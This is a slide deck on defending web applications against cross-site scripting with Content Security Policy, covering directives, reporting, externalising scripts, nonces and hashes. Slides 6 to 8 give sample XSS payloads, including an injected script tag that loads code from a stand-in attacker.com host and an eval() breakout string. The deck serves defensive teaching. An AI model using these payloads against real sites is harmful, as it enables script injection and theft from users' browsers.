Preventing XSS with Content Security Policy
Ksenia Peguero
1.
1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
KSENIA DMITRIEVA
Preventing XSS with Content Security Policy (CSP)
2.
Introduction
Who am I?
• Senior Security Consultant @Cigital
• @KseniaDmitrieva
• Ballroom dancer
3.
Content Security Policy (CSP) Agenda
Questions to answer today:
• Why do we need CSP?
• What is CSP?
• How is the policy configured and enforced?
• How is CSP applied to existing web applications?
• What improvements is CSP 1.1 bringing?
• More questions?
4.
How to Protect from XSS?
(diagram: the three XSS classes, Reflected, Stored (via the DB) and DOM-based)
5.
How to Protect from XSS?
(same diagram, second build of the slide)
6.
Ways to Exploit an XSS: injecting inline JavaScript

Malicious request:
    GET http://example.com/index.html?s=<script>alert('xss');</script>

Vulnerable server-side JSP code (the parameter is written into the page with <%= %>, which performs no HTML encoding):
    <% String search_word = request.getParameter("s"); %>
    <p> Search results for (<%= search_word %>)</p>

Server response (search_word now holds the attacker's string, and the browser runs it as part of the page):
    <% String search_word = "<script>alert('xss');</script>"; %>
    <p> Search results for (<script>alert('xss');</script>)</p>
7.
Ways to Exploit an XSS: injecting a third-party JavaScript

Malicious request:
    GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/>

Vulnerable server-side JSP code (same template as before):
    <% String search_word = request.getParameter("s"); %>
    <p> Search results for (<%= search_word %>)</p>

Server response (the page now loads and runs a script from the attacker's host):
    <% String search_word = "apple<script src="http://attacker.com/parse_page.js"/>"; %>
    <p> Search results for (apple<script src="http://attacker.com/parse_page.js"/>)</p>

Note: <script> is not a void element in HTML, so the self-closing form on this slide is shorthand; a working payload closes the element explicitly with </script>.
8.
Ways to Exploit an XSS: injecting into eval()

Vulnerable JavaScript (user input is concatenated into a string that is then evaluated as code):
    var function_name = "display";
    var user_input = document.getElementById("parameter").value;
    eval(function_name+"('"+user_input+"');");
    // Result with benign input: display('firstname');

Malicious input:
    user_input="firstname'); alert('xss";

JavaScript result (the quote and parenthesis close the intended call, and a second statement follows it):
    eval("display"+"('"+"firstname'); alert('xss"+"');");
    // Result: display('firstname'); alert('xss');
9.
What is Content Security Policy?
CSP defines a list of resource directives:
• script-src
• connect-src
• font-src
• frame-src
• style-src
• img-src
• media-src
• object-src
(diagram: a form with First Name, Last Name, Address, Email and Submit, and the resources the page pulls in: a third-party <iframe src="http://attacker.com/hello.htm"></iframe>, an inline <script> ... </script>, <script src="https://malicioussites.com/spam.js"/> and <script src="https://jquery.org/libraries/jquery.js" />)
Content Security Policy:
• Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval().
• Imposes restrictions on resources based on their origin.
10.
Sample CSP Policies
The policy is sent by the server as an HTTP header:
    Content-Security-Policy: script-src 'self' https://apis.google.com
Any malicious inline scripts or scripts hosted elsewhere will not be executed. (Only script-src is set here, so every other resource type is still unrestricted.)

Can a page with the following policy load an image from http://www.bbc.com/?
    Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *
Yes: img-src * overrides the default-src fallback for images and allows any source.

Can a page with the following policy load a script from http://attacker.com?
    Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com
No: there is no script-src, so scripts fall back to default-src, which does not list attacker.com. (The slide writes fonts-src; the directive is font-src. A browser ignores a directive name it does not recognise, so the misspelt one would silently have no effect.)

Can a page with the following policy load a CSS from http://wordpress.org?
    Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none'
Yes: neither style-src nor default-src is set, so style sheets are not restricted at all.

Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
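The three questions on this slide come down to two rules: a missing directive falls back to default-src, and a missing default-src means no restriction. The following is an added example, not the deck's code and not a browser's implementation: a small evaluator for CSP source lists that applies those rules, with host-source, scheme-source, 'self', 'none' and '*' matching and a parser that drops unrecognised directive names the way a browser does. It ignores nonces, hashes and the 'unsafe-*' keywords. The page origin http://www.example.com is an assumption, needed only so that 'self' has something to match.

```javascript
// Added example: evaluate a CSP header for one resource load. Node.js, no dependencies.

// Fetch directives whose fallback is default-src (the ones used in the deck).
const FETCH_DIRECTIVES = new Set([
  'script-src', 'style-src', 'img-src', 'font-src', 'connect-src',
  'media-src', 'object-src', 'frame-src', 'default-src',
]);

// "default-src 'self' a.com; img-src *" -> Map { 'default-src' => [...], 'img-src' => [...] }
// Unknown directive names are dropped (a browser ignores them); if a directive
// is repeated, the first occurrence wins, as in the spec.
function parsePolicy(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!FETCH_DIRECTIVES.has(name) || policy.has(name)) continue;
    policy.set(name, tokens.slice(1));
  }
  return policy;
}

// Does one source expression match the URL? pageOrigin is needed for 'self'.
function sourceMatches(expr, url, pageOrigin) {
  const u = new URL(url);
  if (expr === "'none'") return false;
  if (expr === "'self'") return u.origin === pageOrigin;   // exact scheme+host+port
  if (expr.startsWith("'")) return false;                  // other keywords never match a URL
  if (expr === '*') return !['data:', 'blob:', 'filesystem:'].includes(u.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) {                 // scheme-source, e.g. https:
    return u.protocol.toLowerCase() === expr.toLowerCase();
  }
  // host-source: [scheme://]host[:port][/path]; host may start with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\*|\d+))?(\/.*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme && u.protocol !== `${scheme.toLowerCase()}:`) return false;
  const hostname = u.hostname.toLowerCase();
  const hostMatches = wildcard
    ? hostname.endsWith('.' + host.toLowerCase())            // *.a.com matches b.a.com, not a.com
    : hostname === host.toLowerCase();
  if (!hostMatches) return false;
  if (port && port !== '*') {
    const urlPort = u.port || (u.protocol === 'https:' ? '443' : '80');
    if (urlPort !== port) return false;
  }
  if (path && !u.pathname.startsWith(path)) return false;  // simplified: prefix match
  return true;
}

// Is a resource of the given type (e.g. 'img-src') allowed from url?
// 'allowed' or 'blocked' name the directive that decided; 'unrestricted' means
// neither the directive nor default-src is present, so CSP does not apply.
function evaluate(header, directive, url, pageOrigin) {
  const policy = parsePolicy(header);
  const governing = policy.has(directive) ? directive
    : policy.has('default-src') ? 'default-src' : null;
  if (governing === null) return { result: 'unrestricted' };
  const allowed = policy.get(governing).some((e) => sourceMatches(e, url, pageOrigin));
  return { result: allowed ? 'allowed' : 'blocked', directive: governing };
}

const PAGE = 'http://www.example.com';   // assumed page origin for the examples below
for (const [header, directive, url] of [
  ["default-src 'self' *.mydomain.com; img-src *", 'img-src', 'http://www.bbc.com/logo.png'],
  ["default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com",
    'script-src', 'http://attacker.com/evil.js'],
  ["script-src 'self'; frame-src 'none'; object-src 'none'", 'style-src', 'http://wordpress.org/a.css'],
]) {
  console.log(directive, url, '->', JSON.stringify(evaluate(header, directive, url, PAGE)));
}
```

The 'unrestricted' result is the one to watch for when reviewing a policy: the last question on the slide is answered "yes" not because the policy allows wordpress.org but because nothing in it governs style sheets at all. Starting every policy with a restrictive default-src removes that class of surprise.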
11.
CSP Reporting
Report violations of the policy to the server with the report-uri directive:
    Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php;
Sample reported JSON (the browser POSTs it to the report-uri):
    {
      "csp-report": {
        "document-uri": "http://example.com/page.html",
        "referrer": "http://evil.example.com/",
        "blocked-uri": "http://evil.example.com/evil.js",
        "violated-directive": "script-src 'self' https://apis.google.com",
        "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php"
      }
    }
Different browsers format reports differently!
12.
CSP Reporting and Enforcing
• The Content-Security-Policy header with report-uri enforces the policy and reports violations
• The Content-Security-Policy-Report-Only header reports policy violations, but does not enforce the policy
    Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php
• Use both headers: one to enforce the old policy and another to test out the new policy
    Content-Security-Policy: default-src 'self' *.google.com;
    Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
13.
Externalizing JavaScript
Move all inline script, inline CSS and event handlers into external files, and replace eval()-like constructs (eval, string arguments to setTimeout and setInterval, new Function) with real functions.

Without CSP (Page.html: an inline script block, inline event handlers, and a string argument to setTimeout, which is evaluated like eval()):
    <!doctype html>
    <html>
    <head>
      <title>My Page</title>
      <script type="text/javascript">
        function repeated() { ... }
        function clickHandler(element) {
          setTimeout("console.log('lapse'); repeated()", 1000);
        }
        function init() { ... }
      </script>
    </head>
    <body onload="init();">
      <button onclick="clickHandler(this)">
        Click me!
      </button>
    </body>
    </html>

With CSP (Page.html: nothing but a reference to an external file):
    <!doctype html>
    <html>
    <head>
      <title>My Page</title>
      <script src="mypage.js"></script>
    </head>
    <body>
      <button>Click me!</button>
    </body>
    </html>

With CSP (mypage.js: handlers attached with addEventListener, setTimeout given a function instead of a string):
    function repeated() {...}
    function repeatedTask() {
      console.log('lapse');
      repeated();
    }
    function clickHandler(e) {
      setTimeout(repeatedTask, 1000);
    }
    function init() {...}
    document.addEventListener('DOMContentLoaded', function () {
      document.querySelector('button')
        .addEventListener('click', clickHandler);
      init();
    });
14.
Externalizing JavaScript
(same slide, showing only the "With CSP" Page.html and mypage.js from slide 13)
15.
CSP Adoption
http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/
CSP 1.0 is supported by the following browsers:
• Internet Explorer – partial support, requires a prefixed header name: X-Content-Security-Policy
• Firefox desktop 23, Firefox for Android 30, Chrome desktop 25, Chrome for Android 35, Safari desktop 7, iOS Safari 7, Opera desktop 22
• Opera Mini – no support
CSP adoption rate is slow. Most of the CSP policies seen in the wild use the unsafe keywords 'unsafe-eval' and 'unsafe-inline'.
16.
Real World CSP Adoption Examples
Twitter uses CSP on all their services (January 2015).
    Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe-eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;
    Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
Note the difference between the two: the first policy's script-src allows 'unsafe-inline' and 'unsafe-eval' from any https: origin, so it only stops plaintext-http script loads; the second restricts script to a single host with no inline or eval allowance.
17.
Real World CSP Adoption Examples
Yelp uses CSP on www.yelp.com (January 2015).
    Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
With default-src * and 'unsafe-inline' 'unsafe-eval' in script-src, this policy does not stop an injected inline script: it is a whitelist of third-party script hosts, not an XSS defence.
18.
Content Security Policy 1.1
Using 'unsafe-eval' and 'unsafe-inline' is equal to turning the CSP off!
CSP 1.1 (or Level 2) addresses the issue of broken policies:
• nonce-source expressions
• hash-source expressions
• policies in <meta> tags
CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014
CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30
    <meta http-equiv="Content-Security-Policy" content="script-src 'self'"/>
(The slide writes name="content-security-policy"; the attribute browsers honour is http-equiv. A policy delivered in <meta> also cannot carry report-uri, frame-ancestors or sandbox; those directives are ignored there.)
19.
Nonce Source
• Add a nonce attribute to every inline script in the page
    <script nonce="ZDU4eHjBDQ"> function onButtonClick() … </script>
• Add the matching nonce source to the script-src directive
    Content-Security-Policy: script-src 'nonce-ZDU4eHjBDQ' 'self'
  (The slide writes "nonce=ZDU4eHjBDQ" in double quotes; the syntax browsers accept is the single-quoted 'nonce-<base64-value>' form.)
• Generate a fresh, unpredictable nonce each time the page is requested; a static or guessable nonce lets an attacker put it on an injected script
• Do not automatically add a nonce to every <script> in the response: an injected script would receive one too
• Add the nonce to inline JavaScript in the view template, where the application knows which scripts are its own
20.
Hash Source
Will the nonce source prevent DOM-based XSS in dynamically generated JavaScript? No (marked with an X on the slide).
    <script> function onButtonClick() … </script>
Solution: mark every inline JavaScript with a hash!
• The hash-source expression puts a digest of each allowed inline script into the policy
• The browser hashes every inline script it encounters and runs it only if the digest matches one in the policy
Hash the script contents and add the Base64-encoded digest to the CSP header:
    Content-Security-Policy: default-src 'self'; script-src 'sha256-MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJlYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ=='
Caveat: the two values on the slide are 88 characters long, which is the Base64 encoding of the hex representation of the digest. Browsers expect the Base64 encoding of the 32 raw digest bytes, which is 44 characters; an 88-character value never matches and the script is blocked.
21.
Q&A
Resources:
• W3C Standard for CSP 1.1: http://www.w3.org/TR/CSP11/
• CSP Reference: http://content-security-policy.com/
• An Introduction to CSP by Mike West: http://www.html5rocks.com/en/tutorials/security/content-security-policy/
• Making CSP Work for You by Mark Goodwin: https://www.youtube.com/watch?v=F7eCP08nacI&t=2h14m16s
• Automatic XSS protection with CSP by Neil Matatall: https://blog.matatall.com/2013/09/automatic-xss-protection-with-csp-no-changes-required/
• Generating Content-Security-Policies, the easy way: http://c0nrad.io/blog/csp.html
22.
@KseniaDmitrieva
kdmitrieva@cigital.com